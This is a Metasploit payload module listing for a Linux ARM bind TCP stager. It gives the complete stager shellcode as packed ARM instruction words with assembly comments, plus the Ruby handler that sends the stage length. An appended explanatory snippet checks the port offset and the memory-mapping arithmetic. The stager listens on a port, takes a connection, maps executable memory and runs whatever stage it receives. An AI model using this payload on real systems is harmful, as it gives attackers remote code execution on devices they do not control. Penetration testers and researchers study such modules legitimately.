Linux dup2 Command Shell, Bind TCP Stager

17 May 2013 17:09:45
Reported by nemo <[email protected]>
Type: metasploit
Source: www.rapid7.com

Linux bind TCP stager. Listen for a connection.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


###
#
# BindTcp
# -------
#
# Linux bind TCP stager.
#
###
module MetasploitModule

  CachedSize = 232

  include Msf::Payload::Linux::Armle::Prepends
  include Msf::Payload::Stager

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Bind TCP Stager',
      'Description'   => 'Listen for a connection',
      'Author'        => 'nemo <nemo[at]felinemenace.org>',
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_ARMLE,
      'Handler'       => Msf::Handler::BindTcp,
      'Stager'        =>
        {
          'Offsets' =>
            {
              'LPORT' => [ 214, 'n'    ],
            },
          'Payload' =>
          [
            0xe59f70d4,           # ldr     r7, [pc, #212]
            0xe3a00002,           # mov     r0, #2
            0xe3a01001,           # mov     r1, #1
            0xe3a02006,           # mov     r2, #6
            0xef000000,           # svc     0x00000000
            0xe1a0c000,           # mov     ip, r0
            0xe2877001,           # add     r7, r7, #1
            0xe28f10b0,           # add     r1, pc, #176
            0xe3a02010,           # mov     r2, #16
            0xef000000,           # svc     0x00000000
            0xe2877002,           # add     r7, r7, #2
            0xe1a0000c,           # mov     r0, ip
            0xef000000,           # svc     0x00000000
            0xe2877001,           # add     r7, r7, #1
            0xe1a0000c,           # mov     r0, ip
            0xe0411001,           # sub     r1, r1, r1
            0xe1a02001,           # mov     r2, r1
            0xef000000,           # svc     0x00000000
            0xe1a0c000,           # mov     ip, r0
            0xe24dd004,           # sub     sp, sp, #4
            0xe2877006,           # add     r7, r7, #6
            0xe1a0100d,           # mov     r1, sp
            0xe3a02004,           # mov     r2, #4
            0xe3a03000,           # mov     r3, #0
            0xef000000,           # svc     0x00000000
            0xe59d1000,           # ldr     r1, [sp]
            0xe59f3070,           # ldr     r3, [pc, #112]
            0xe0011003,           # and     r1, r1, r3
            0xe3a02001,           # mov     r2, #1
            0xe1a02602,           # lsl     r2, r2, #12
            0xe0811002,           # add     r1, r1, r2
            0xe3a070c0,           # mov     r7, #192
            0xe3e00000,           # mvn     r0, #0
            0xe3a02007,           # mov     r2, #7
            0xe59f3054,           # ldr     r3, [pc, #84]
            0xe1a04000,           # mov     r4, r0
            0xe3a05000,           # mov     r5, #0
            0xef000000,           # svc     0x00000000
            0xe2877063,           # add     r7, r7, #99
            0xe1a01000,           # mov     r1, r0
            0xe1a0000c,           # mov     r0, ip
            0xe3a03000,           # mov     r3, #0
            0xe59d2000,           # ldr     r2, [sp]
            0xe2422ffa,           # sub     r2, r2, #1000
            0xe58d2000,           # str     r2, [sp]
            0xe3520000,           # cmp     r2, #0
            0xda000002,           # ble     811c <last>
            0xe3a02ffa,           # mov     r2, #1000
            0xef000000,           # svc     0x00000000
            0xeafffff7,           # b       80fc <loop>
            0xe2822ffa,           # add     r2, r2, #1000
            0xef000000,           # svc     0x00000000
            0xe1a0f001,           # mov     pc, r1
            0x5c110002,           # .word   0x5c110002
            0x00000000,           # .word   0x00000000
            0x00000119,           # .word   0x00000119
            0xfffff000,           # .word   0xfffff000
            0x00001022            # .word   0x00001022
          ].pack("V*")

        }
      ))
  end

  def handle_intermediate_stage(conn, payload)

    print_status("Transmitting stage length value...(#{payload.length} bytes)")

    address_format = 'v'

    # Transmit our intermediate stager
    conn.put( [ payload.length ].pack(address_format) )

    return true
  end
end
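The following is an added example, not part of the Metasploit module above: it re-checks the stager's metadata (CachedSize and the LPORT offset) the way a module reviewer would, shows how the framework's Offsets table patches the port into the packed payload, and mirrors the arithmetic the ARM code applies to the received stage length. The 53 instruction words are replaced by a same-length placeholder (constructed); only the five trailing data words are the module's own.

```ruby
# Added example, not part of the module above: checks a reviewer would run on
# the stager's metadata, plus the arithmetic the ARM code applies to the stage
# length. The 53 instruction words are replaced by a same-length placeholder
# (constructed); the five trailing data words are the module's own.
CACHED_SIZE  = 232
LPORT_OFFSET = [214, 'n']    # from the module's 'Offsets' table: big-endian u16

INSTRUCTION_WORDS = 53
DATA_WORDS = [
  0x5c110002,  # sockaddr_in head: sin_family = AF_INET (2), sin_port = htons(4444)
  0x00000000,  # sin_addr = INADDR_ANY
  0x00000119,  # 281 = initial r7 (socket syscall number on ARM EABI)
  0xfffff000,  # page mask applied to the received stage length
  0x00001022,  # mmap2 flags
]

def stager_bytes
  # 0xe1a00000 is "mov r0, r0", used only as a placeholder for the real instructions
  (Array.new(INSTRUCTION_WORDS, 0xe1a00000) + DATA_WORDS).pack('V*')
end

# Find the sockaddr_in in the packed payload and return the byte offset of sin_port.
def lport_offset(blob)
  sockaddr_at = blob.index([DATA_WORDS[0]].pack('V'))
  sockaddr_at + 2   # struct sockaddr_in { u16 sin_family; u16 sin_port; u32 sin_addr; }
end

def decode_sockaddr(blob, at)
  family, port, addr = blob[at, 8].unpack('vna4')
  { family: family, port: port, addr: addr.unpack('C4').join('.') }
end

# What the framework does with 'Offsets' => { 'LPORT' => [214, 'n'] }.
def patch_lport(blob, port)
  off, fmt = LPORT_OFFSET
  out = blob.dup
  out[off, 2] = [port].pack(fmt)
  out
end

# Mirror the stager's handling of the received stage length:
# (len & 0xfffff000) + 0x1000, i.e. round down to a page, then add one page.
def mmap_size_for(stage_len)
  (stage_len & DATA_WORDS[3]) + (1 << 12)
end
```

Running `lport_offset(stager_bytes)` returns 214, matching the module's Offsets entry, and `mmap_size_for(5000)` returns 8192, the mapping the stager reserves for a 5000-byte stage.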
